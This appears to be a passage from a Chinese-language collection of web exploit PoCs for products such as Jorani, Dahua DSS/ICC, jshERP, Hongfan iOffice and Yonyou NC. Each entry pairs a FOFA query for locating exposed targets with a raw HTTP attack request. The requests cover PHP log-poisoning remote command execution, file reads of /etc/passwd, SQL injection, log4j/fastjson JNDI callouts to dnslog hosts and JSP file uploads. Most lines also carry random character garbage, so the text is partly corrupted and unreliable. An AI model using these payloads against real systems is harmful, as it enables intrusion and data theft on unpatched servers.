( T; K5 c# e) ]Pragma: no-cache: A& y1 }. T5 b5 F0 i% W0 `3 n
Cache-Control: no-cache; H/ ^$ t1 l5 N3 W
Upgrade-Insecure-Requests: 1& C9 |5 A& p' j2 P* V+ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" H( h& h/ s0 V! E! H7 s) S7 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 H# u8 i. j6 F1 S5 B& d8 k8 SAccept-Encoding: gzip, deflate" S1 [) U/ f' P" o% V# _/ M
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 n4 G, j# p, H/ ^Connection: close u' J) Y8 O& `5 {* v, q) T
' S8 J* e) Y$ ?, C8 Z' m0 k+ E! ^6 k- D- ^2 e1 v: d0 Q. ]9 @
12. Jorani < 1.0.2 远程命令执行$ v; ~0 B# N4 n% B4 e
FOFA:title="Jorani"
6 N5 ] I8 [$ c第一步先拿到cookie
3 J. J& X; ~- J8 @$ ~& aGET /session/login HTTP/1.1 s; ~6 R7 d3 Z
Host: 192.168.190.30" @' u: ]5 ?6 @9 o
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) t$ p& E) x4 n6 y! T; d3 m$ B
Connection: close
3 m7 ?: k# C0 nAccept-Encoding: gzip9 c! h0 q! T7 w9 K) {3 e5 G8 B
5 M" r4 L+ n6 l0 H4 U
; U2 e8 y( v& H8 Y; S7 h$ |* A响应中csrf_cookie_jorani用于后续请求
' k% D/ ~3 ?" k, t; T$ @, pHTTP/1.1 200 OK8 d4 V4 W: g' {' A5 p4 T
Connection: close% r6 @7 w I8 c$ P; ?: P$ C% @
Cache-Control: no-store, no-cache, must-revalidate
/ }; R! ? P5 _. @2 M6 N$ y( MContent-Type: text/html; charset=UTF-8- O$ _$ `# R8 |. S% f
Date: Tue, 24 Oct 2023 09:34:28 GMT0 T3 e+ e& U1 F
Expires: Thu, 19 Nov 1981 08:52:00 GMT
, ^5 ^+ v1 N. a* V, YLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT8 H! F- {: W. _% Z; h2 ^0 ?
Pragma: no-cache
! m5 x9 @( u: Q8 ~6 YServer: Apache/2.4.54 (Debian)+ K! X: ?' n f N+ _. @
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/1 S* M& B5 @* a, C! R
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly- ~! B6 ]/ ] F0 F9 I0 N
Vary: Accept-Encoding
3 h/ C- n0 h! W+ R' R9 w6 Z( W5 g: t! s6 m9 g0 p- t" M! d. k! I" k
( X7 |$ W/ k* _" x& Z! f( b; P, TPOST请求,执行函数并进行base64编码: y3 \& R2 z9 y0 k- }$ N* u" C7 X
POST /session/login HTTP/1.1% w7 L. v) T* F; {1 [+ X5 u, g
Host: 192.168.190.30
8 }0 R2 J1 u# Y+ ?4 `0 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
. j/ A8 g' y. s& D* t( gConnection: close& h! A, n* i* S+ G& u5 [
Content-Length: 252
" |$ f1 Q( X4 ^1 ^* n/ v. i7 zContent-Type: application/x-www-form-urlencoded
; I+ F0 j; o) c( ]1 D# tCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
' q9 \, S' ^" L+ o3 H% {! ^" JAccept-Encoding: gzip8 q/ Y. e; g i. U2 D/ M7 U7 \' K
7 T/ g: W6 X7 u( K8 Z8 icsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
' m+ S h' Z. [* D% j5 {4 p; z6 a. L, l6 F j
# K4 l+ s7 z* D8 F! T4 X
, W" @3 L: W& Z+ W' K5 o& D4 E/ D向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串1 @& k4 Q" }8 ^6 ^! o
GET /pages/view/log-2023-10-24 HTTP/1.1- y7 d. H' U4 E$ Q* u) H2 K9 B9 r
Host: 192.168.190.30% }2 w& j. O# R! ^3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; Z8 M4 r$ m$ d. F0 P1 n V
Connection: close
9 t1 P! Q! Z: q2 D4 @Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r1 w7 A7 r' O; Z( h9 k3 i
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=4 j7 ^* }8 _5 { Z/ Q2 J
X-REQUESTED-WITH: XMLHttpRequest
5 H( A$ l" N- q" \. e( H' dAccept-Encoding: gzip6 A& ~) D9 I& [. r# q& ~
* l$ ]0 m! H0 Y9 s+ _( [$ q, o1 |; I. O9 y
13. 红帆iOffice ioFileDown任意文件读取( S4 {; o4 h: Q! H. a; \
FOFA:app="红帆-ioffice"
' b: V8 m. T. g9 B) a5 Z! V7 m! ?GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1, @1 l# F2 A s3 ^
Host: x.x.x.x$ r; F' Y" m0 w( t0 z2 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 y& }* U: H) f' S1 ^; DConnection: close9 e X6 m( F* M3 e/ S+ y$ J; s+ T
Accept: */*
0 ^$ W9 r/ S/ e. o; J$ R9 hAccept-Encoding: gzip f3 F% v' ?; p6 E* h
* W) p+ y+ E/ i6 `: I; W
3 M, E& g% [1 H14. 华夏ERP(jshERP)敏感信息泄露7 F. d5 y* }- b8 m( x! w
FOFA:body="jshERP-boot"8 E$ p6 p! m* I
泄露内容包括用户名密码2 }3 n0 @" |* g: F% r
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1; r. }$ A4 q; U$ s" y" T. H. g, D
Host: x.x.x.x
Z8 _5 r I8 u! O }( G5 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
% g# w5 ?) h- W5 d& E7 k8 j VConnection: close6 I3 G- H* f. l0 m4 F
Accept: */*
2 D$ A! p/ F* UAccept-Language: en6 [- w: U7 I+ l; |' C. z
Accept-Encoding: gzip
* p. r2 u2 m3 f. H$ P6 C% Q d. H4 K8 C& J
5 m* T9 y9 `8 n Y/ [; s15. 华夏ERP getAllList信息泄露9 d; k* k* c: w3 k2 @3 H
CVE-2024-0490
+ @6 S+ A Q8 ], Q/ w9 ZFOFA:body="jshERP-boot"
{7 P! V2 h9 K泄露内容包括用户名密码& N: I- K0 R; O
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
I, c2 m/ |4 X0 q$ |5 X. gHost: 192.168.40.130:100
- L( D- j1 n0 m5 K! n" I- f( ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36- J% p! o' ?) z" J% ?) C8 ?( j! F+ ?
Connection: close
3 [5 L8 y0 O; V/ z: cAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8' K% P H% g) V8 V4 `
Accept-Language: en$ g4 y% P) P* r: m3 _7 R* y1 ^
sec-ch-ua-platform: Windows
8 t* A# A* g' d8 W! tAccept-Encoding: gzip
. k$ j% v7 ~) J/ G# Q3 n% i5 ^+ s8 ?) }
4 F w! D! d3 |16. 红帆HFOffice医微云SQL注入& _2 ~. W3 f! z* \4 h3 l1 c* D7 q
FOFA:title="HFOffice"$ Y$ I/ Z9 q/ H5 M; J- m6 P
poc中调用函数计算1234的md5值
( ]# \0 a' [' ?! O! C* fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
& a: ^9 |. ~. vHost: x.x.x.x4 ?. D, V- {& `( N9 y! ^
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# M9 _0 k5 Z; M( Y1 j1 k* [
Connection: close' U4 k ^8 k; C$ i T& k a
Accept: */*
$ ^8 d, Z% B$ t% c0 P' R! ^Accept-Language: en
4 z4 O# w+ V! ]. ^$ n+ f' BAccept-Encoding: gzip
8 A2 S/ s* B0 r, ?5 u
$ b) `* h$ D/ Z9 u8 h& f+ w: u+ ~) c, n, Z7 m: N/ j
17. 大华 DSS itcBulletin SQL 注入
$ l3 u0 r; H% ~1 i) u6 b/ `! }* X4 OFOFA:app="dahua-DSS"& j | S6 k& m E
POST /portal/services/itcBulletin?wsdl HTTP/1.1 R# ?0 |7 d; g
Host: x.x.x.x
) s; C. c4 ~( I9 d+ ?/ `. u9 Q6 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" \- z9 K0 {' t! e {# {+ YConnection: close) p. e' W9 E" d! T1 z
Content-Length: 3456 }5 u% w5 J! i2 g! F( {. V( N
Accept-Encoding: gzip
7 q" _) V. M/ W' E4 O9 D' @0 K* {
" X6 a5 U8 [: }* p* Z$ m! ^- j; |<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
& m& C/ j; I0 o& z$ x<s11:Body>
, p" |. c. K1 A <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>5 g) [- k3 Q& l5 e0 u2 n
<netMarkings>
! Q( k1 v* I) o6 l ^! V (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
; ~& i; C9 S* b </netMarkings>; S8 F* q9 a( m
</ns1:deleteBulletin>" s. n% [8 U d' M. D" M# \
</s11:Body>
- K8 M ~% M3 p2 i2 t- J</s11:Envelope>
7 I0 r3 e1 x. a9 f; ^
# `* b0 B- U4 q' D% W* U. g8 b9 }. ^6 G B% b
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 x- O6 I) \& n5 G4 ZFOFA:app="dahua-DSS". }5 j) L7 J, ~& p6 }! g: s: h" C( W
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
5 G3 E3 u, r. Q$ S0 SHost: your-ip
& x. V' f/ c( sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! D3 J" d$ u! g/ @Accept-Encoding: gzip, deflate$ U/ | y o8 t
Accept: */*, P7 d- g" n( g+ h) S$ T
Connection: keep-alive/ T, e7 f" R+ t- ?2 o4 @- A
7 }/ W% d# [5 K% N
6 r- C0 d& c9 U. v8 V* O/ L
( s& H! ]% v" H! ~& `/ N19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- J* T' d( _6 N- p' }
FOFA:app="dahua-DSS"
7 P* G2 L' T( {GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# U: ^; l( _# [Host:2 j' g. Z; l) Y6 \/ w( g% k$ n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- j o) E) a6 ?. d; M+ }
Accept-Encoding: gzip, deflate5 U% T) F9 N3 [5 o
Accept: */*
" Q! K B$ H4 h& @- h1 S8 T" c: @Connection: keep-alive6 O( V8 X, o9 H; l1 `; g
B+ I" [! g0 p6 U" K5 [, i- w- q: i& s+ Z7 b8 w& O9 p- h
20. 大华ICC智能物联综合管理平台任意文件读取! W# V& ^+ f: S& M1 p' C4 U+ D ?
FOFA:body="*客户端会小于800*"
9 H7 w5 d1 v IGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.19 W& P. i; V! m. h
Host: x.x.x.x
9 D- M" Q: t# Q8 L& V# XUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* p# |, n) Y/ A) }* s" R
Connection: close, B* y& K' L$ V- _+ i! v
Accept: */*
' X& H* o! W4 ~( P& Z7 ZAccept-Language: en
# `7 f( G+ @1 U! G9 r9 FAccept-Encoding: gzip
; r0 ]; q2 F% d
$ M. i$ m8 I! k, f* F/ w" A5 H# D3 |+ k$ A0 O( Q# j7 e
21. 大华ICC智能物联综合管理平台random远程代码执行, s% k5 x R* L2 [# P: {
FOFA:icon_hash="-1935899595"3 S! \ a5 N( ?% w! a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1; `, J! P C2 G! E) i
Host: x.x.x.x; S: q6 W. C8 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 C* U8 X7 S2 T ^6 R: t, p
Content-Length: 161
/ w9 g6 }. P0 S: \6 X7 i% qAccept-Encoding: gzip
7 Q' m: B: B# a. t9 \, [/ C# GConnection: close, Y% P3 H" ]& D* m& i8 k
Content-Type: application/json;charset=utf-8
+ o$ {, ~/ m6 b: d' M! d$ Q9 f
0 v Y# k/ a4 C% h% I{8 `; r+ l6 e5 r5 h
"a":{# z% u: b- ^6 Z' V; J7 i
"@type":"com.alibaba.fastjson.JSONObject",
+ [4 ^. Q9 C; D& Z {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}' R9 {) v/ t/ B) N! V% r3 M4 ^) F
}""
8 o: W2 K E. a% T( ?}
# H. H+ Y# F' T# c+ q* ^3 D9 u# y0 T+ r
% [. ^5 T3 y' D: O, l% g. c22. 大华ICC智能物联综合管理平台 log4j远程代码执行
2 ~$ F5 h; d- Y3 r. e1 |FOFA:icon_hash="-1935899595"4 W1 p$ @( _$ k* \/ f" x Y' V
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. H0 `9 y# W# v2 l+ u$ QHost: your-ip
) O c8 {7 t! P* U0 \8 e( EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ G! n' Y9 [ w$ [1 r
Content-Type: application/json;charset=utf-8! }' X2 i2 I+ \! L9 J
1 i5 F6 ^5 r5 `7 D% n
{, a6 l' N i) f2 m% H4 b. H
"loginName":"${jndi:ldap://dnslog}"
* F9 ^) h+ ~6 I% l5 Z}
6 d6 U' z: L- w8 n" R3 y
: Q L/ v0 U' x
* E0 s9 O0 i0 m& t1 N" h0 t! E4 q3 \
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! K8 c9 h& K, M7 m
FOFA:icon_hash="-1935899595"
- J) b6 l$ S6 w4 R4 iPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% j+ _; I/ ?3 ]7 `7 @
Host: your-ip
8 I H9 ~5 Y! J6 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 @( a1 z/ S5 Y; H* u0 Q
Content-Type: application/json;charset=utf-84 b: ]1 M) Y6 c( B+ T2 G( z! u( p
Accept-Encoding: gzip: w" {, T4 C; r& D: ?. A
Connection: close
& W* o* }2 e3 F" Y* I$ j G y& q0 F% T, K/ I5 y1 b' b
{# C4 k5 p, Y3 R* |& e! f
"a":{; v6 K& C- d! U- _# W
"@type":"com.alibaba.fastjson.JSONObject",% @* O! }3 n( E
{"@type":"java.net.URL","val":"http://DNSLOG"}5 B, y$ I* n r& Z2 _: T* T
}""5 w) F" k" v8 {5 Z# o" h
}
) c) @! a/ _5 M# ?% b! ~6 U5 [* I) R7 j" z9 B3 L
! z" u- j$ }7 s& f, C
24. 用友NC 6.5 accept.jsp任意文件上传
4 f6 t: h" u# E, j; a1 L2 \/ z# aFOFA:icon_hash="1085941792"6 b! t1 d, j; n" M. N8 v5 m
POST /aim/equipmap/accept.jsp HTTP/1.1
7 o: I, l4 \0 r/ ] C7 E4 xHost: x.x.x.x2 ~* k+ C1 X$ r0 |2 Q x6 s
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36+ l _( e2 b: J) O: A# |) |% b0 N$ H
Connection: close, m; u W( Z8 P/ `4 V
Content-Length: 449
7 J4 ^$ u/ W( m# B8 _7 K- @Accept: */*5 u& ~) d+ ?0 {7 ]0 Q6 V# E% ~6 u
Accept-Encoding: gzip
& [) v) R% F6 q" m; SContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
8 _9 ^/ W# [! _9 Y4 x" S* f& i r2 i5 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 e/ E; m( y$ y: h9 `' B
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"1 R* v: {+ f5 {2 }, f
Content-Type: text/plain3 D4 t7 v Q( ]! u3 N" _" j$ `; `
6 h0 r" I1 k, d, R* f7 {4 h4 x6 i<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
b& A1 M6 b% m7 e! o: E) C/ F0 p D-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% L2 q' D3 C0 Y0 Z+ X" [; E
Content-Disposition: form-data; name="fname"$ J* @ {! P& X+ [" t
8 U8 u, m2 \2 u\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp2 P/ x* Y; } j. }
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--! d4 Z- [# d1 e5 J; x. C% _( u; ~
" R, G& f s0 G. C: W% ~
8 x( y7 [6 D6 T4 B8 [4 c25. 用友NC registerServlet JNDI 远程代码执行
' i e/ o- t; ^) I# {0 GFOFA:app="用友-UFIDA-NC"
0 n+ j [# W6 r1 H8 }1 W/ ]POST /portal/registerServlet HTTP/1.1
! M0 q/ @( ^0 t4 }* e8 n% |Host: your-ip
m# k+ p, p& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
0 r4 q# [5 B$ }8 D/ Y0 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' `% E& ^1 ], O, t5 x) A( d
Accept-Encoding: gzip, deflate' b" ]/ L$ D* w3 E
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6, y" e# d' B$ p5 w
Content-Type: application/x-www-form-urlencoded
' d& R7 ^" I' B! T' Y- f
( u" i' @5 M0 k, itype=1&dsname=ldap://dnslog P" _0 Y1 X: L1 a K, M
8 v( H3 b2 ~& c
4 Z) d0 E* y* P
$ J+ u1 y% k( Q1 h
26. 用友NC linkVoucher SQL注入
* E$ a( O) ]% @" }FOFA:app="用友-UFIDA-NC"
0 I( v# J/ j# H4 z3 P: Y& ^0 pGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.13 e2 g( {# F7 H" ^
Host: your-ip9 f% @5 O) b0 _) M' S) N' q. Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: \% {0 n3 o5 X& _# u$ i% MContent-Type: application/x-www-form-urlencoded- ?% ]! B" a V5 a
Accept-Encoding: gzip, deflate
, h+ O$ h* P% y: @6 h+ _2 Z1 IAccept: */*( Q" e/ R7 c- i, Y$ {1 h# z
Connection: keep-alive
$ v. g: x/ \ \+ w( i4 y6 ~* {$ V( G! R3 B7 S" n2 p
3 f/ ~; A3 y% ^( h0 Y3 Z1 n27. 用友 NC showcontent SQL注入. c$ T2 f: \+ ~. X1 f
FOFA:icon_hash="1085941792"4 { o" X' b3 {* ^; O
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.19 \: s+ p) s, Y2 v( I# ~
Host: your-ip! P( E$ @5 [4 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ B+ I7 n3 x& v9 Y7 Y6 u5 e
Accept-Encoding: identity
( B' L3 s" s. ^2 i' W" x" `) @Connection: close
9 q$ G6 n- D* M4 }$ |2 uContent-Type: text/xml; charset=utf-8
3 K/ q7 b" d7 e2 H |9 R1 j5 E" L; [7 r6 z
1 k# C/ ]" S5 R* c6 m% v
28. 用友NC grouptemplet 任意文件上传7 `2 u7 V0 X Q& \+ p, w. ?+ M
FOFA:icon_hash="1085941792"
8 k, z/ c N5 F9 h3 U2 A5 z4 t5 VPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1/ c- x0 h1 x3 @7 u8 Q* B7 G$ m
Host: x.x.x.x/ w( j# |* @) M; q- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
$ U ~& m6 U, P- \Connection: close" O p4 F* ^% K4 j2 Q' V& @
Content-Length: 268
& W( Z+ t( r# U9 F7 CContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk z3 P; F9 V3 P! b, ?( Q
Accept-Encoding: gzip: M5 _$ f% v7 n0 O7 F* d
. J8 b$ Y% a2 d/ o0 j. [$ }: L1 M
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
0 ~% Z! Z' Q4 EContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
6 {, E c% \; c- ^Content-Type: application/octet-stream! C# ^) u' y% D
) {+ H8 f7 A5 c6 i. h/ i5 a<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
! a1 f8 ^/ }* Q' }3 d------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
3 @) o# z: s! B& v5 G7 o) }. Q; ]
$ D/ O1 X8 O9 a0 h8 @/ U0 c& `6 q1 t Y a4 x. h9 s2 M
/uapim/static/pages/nc/head.jsp
7 W" T7 `: S; y3 D: x# ]& M9 U9 Z& t4 E0 o9 w7 ?
29. 用友NC down/bill SQL注入. }1 U/ w5 \, A8 [3 K7 E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! B$ d& B& o* A0 K3 pGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; p5 v% c, P0 b3 H; e! M# z3 l) i
Host: your-ip/ N7 V; H, |+ Y1 Z9 c2 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& L$ @; w# u$ WContent-Type: application/x-www-form-urlencoded4 h* w& Z% ?, k u8 v
Accept-Encoding: gzip, deflate6 W6 D0 n( I8 d! h! o
Accept: */*+ f2 B6 M0 y/ p1 E1 u# \% w+ P
Connection: keep-alive
! p. c! @; M( ` j V c8 L8 C+ Y0 U K/ b' U* f0 U E6 x8 e: v$ C
3 B" k ? l3 E" ^4 r, b: E7 p30. 用友NC importPml SQL注入8 n. e& ?3 a; E- X
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
: U- n- U# y0 P$ p9 P2 D: K3 o! I. RPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1( i& ~$ M& a+ S
Host: your-ip
4 y3 e2 j1 R) C$ oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V! T6 s$ v) L- ]! P4 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# P' z; ~0 X3 VConnection: close
$ B" @: ]: ~9 a+ C0 C3 h& \4 k) l, M# v8 Y
------WebKitFormBoundaryH970hbttBhoCyj9V
3 |$ b% k' u' [4 {+ o Y1 uContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
7 j' X% V: k2 {8 Y1 H# N" jContent-Type: image/jpeg: [. d0 X9 r: p. o" ]
------WebKitFormBoundaryH970hbttBhoCyj9V--
: [1 S1 A/ K! @ P
. L% G/ H" n9 K1 n9 t7 D9 d, c" _8 f1 [( a7 f6 `3 k; E) x
31. 用友NC runStateServlet SQL注入0 `2 ~% V: O: u/ U5 n0 d
version<=6.5% D! y9 V; d( i3 O4 @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 Z# ?$ K& q1 a7 nGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
k4 H! x& G. S% C8 MHost: host0 f7 l& ?5 s- K( u7 q T8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 _: U8 M& f5 X+ @ p
Content-Type: application/x-www-form-urlencoded. S' Z; l* e! g9 k, F
* ?5 s2 \) n: Y6 V1 e: f/ b$ E Q$ U8 X
32. 用友NC complainbilldetail SQL注入7 G% @' C W& p' ?
version= NC633、NC655 P/ d; J9 c+ z
FOFA:app="用友-UFIDA-NC"( g% O* y% O h+ N
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ o) c# N4 f5 B6 \: A& ] y
Host: your-ip
# U! n3 b% T/ ^- c: [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 c" \$ ~/ h2 C
Content-Type: application/x-www-form-urlencoded' r6 I5 t5 U3 O9 f
Accept-Encoding: gzip, deflate# r3 b% F* ~# @& a( m6 |% A) Z
Accept: */*
" g0 L% V8 F V* i+ N0 PConnection: keep-alive
3 l, E1 N( I+ x! q
7 [1 t' e6 Q& q, P# ]+ f( u# Q
! p( @" Y7 y* C# S6 Z- X1 _" I33. 用友NC downTax/download SQL注入
* j' u, l1 B" i1 Cversion:NC6.5FOFA:app="用友-UFIDA-NC"
5 q% \ M7 O9 W9 h* [" PGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.16 d7 b# C) G" d' j: j
Host: your-ip7 i" q+ ?! z* Y+ A) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 K/ X! D- t8 }6 o
Content-Type: application/x-www-form-urlencoded$ Q* L o# @! E: a
Accept-Encoding: gzip, deflate
' k$ A! b; n8 G) z4 L8 hAccept: */*
& z" p% ^& K" L* ]/ ^. k* LConnection: keep-alive
, B. B1 n o. `7 ~# N, I, N
0 D5 a7 K% c% e) W4 @# F( n3 @% M
34. 用友NC warningDetailInfo接口SQL注入- p, X# w3 J/ z, U
FOFA:app="用友-UFIDA-NC"1 e4 v9 ]$ c6 q
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 v; T! K% N4 C0 v; qHost: your-ip5 f) x8 {8 y: Q" J, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 [4 y7 v9 K, ^% ?5 j1 a
Content-Type: application/x-www-form-urlencoded0 s% {+ i$ d$ ]- l4 f
Accept-Encoding: gzip, deflate& d; ]5 b: |- d1 g: I/ u( f, S
Accept: */*
6 i+ \" E. D* D2 Z2 {' I9 |* ?. qConnection: keep-alive
' b U7 D2 T; A' z+ }# L
& c! L* |8 \7 Y+ v( z% D0 `. V3 t& J' s! Z6 @0 N
35. 用友NC-Cloud importhttpscer任意文件上传
! }1 q( C- x/ j' \FOFA:app="用友-NC-Cloud"1 Q( d2 ~- L9 N6 W
